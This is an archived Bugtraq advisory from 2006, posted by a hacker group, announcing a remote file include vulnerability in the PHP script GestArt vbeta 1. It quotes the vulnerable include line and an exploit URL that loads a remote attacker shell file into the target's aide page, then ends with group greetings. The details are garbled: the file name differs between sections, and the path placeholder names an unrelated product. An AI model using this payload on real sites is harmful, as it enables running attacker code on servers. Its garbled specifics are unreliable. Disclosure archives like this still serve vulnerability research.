| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
| Open Source and information security mailing list archives | ||
| 
 | 
Message-ID: <20061026023151.21644.qmail@securityfocus.com>
Date: 26 Oct 2006 02:31:51 -0000
From: ip.123.456.78.90@...mail.com
To: bugtraq@...urityfocus.com
Subject: GestArt  <= vbeta 1   Remote File Include Vulnerabilities
GestArt  <= vbeta 1   Remote File Include Vulnerabilities
Found By : CoLd Zero  [ Wasem898 ]
Palestine Muslim Hacker's
Code : include("$4AZHAR.Team")
######################################################
#
#           [ GestArt  vbeta 1]
#
# Class:     Remote File Include Vulnerabilities
# Published  2006-10-25
# Remote:    Yes
# Critical   Level :  Dangerous
# Site: http://www.comscripts.com/scripts/php.gestart.642.html
# Author:    Cold Zero
# Contact:   ip.123.456.78.90@...mail.com
#
######################################################
file ;
/gestArt/aide.php
======================================================
Vuln Code:
<? include("$aide.txt");?>
=======================================================
Exploit :
Http:// www.Victem.0 / [WM-News_path[
/gestArt/aide.php3?aide=http://ColdZero-Shell.txt?
----  Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [Root Shell]
[o0xxdark0o]  ]organza[  [Huge] [H@...T]
---- GreeTz: All www.4azhar.Com Members
Cont :  ip.123.456.78.90@...mail.com
Station : WWW.4AZHAR.COM
--------------------------------------||  Viva Palestine
||-----------------------------------------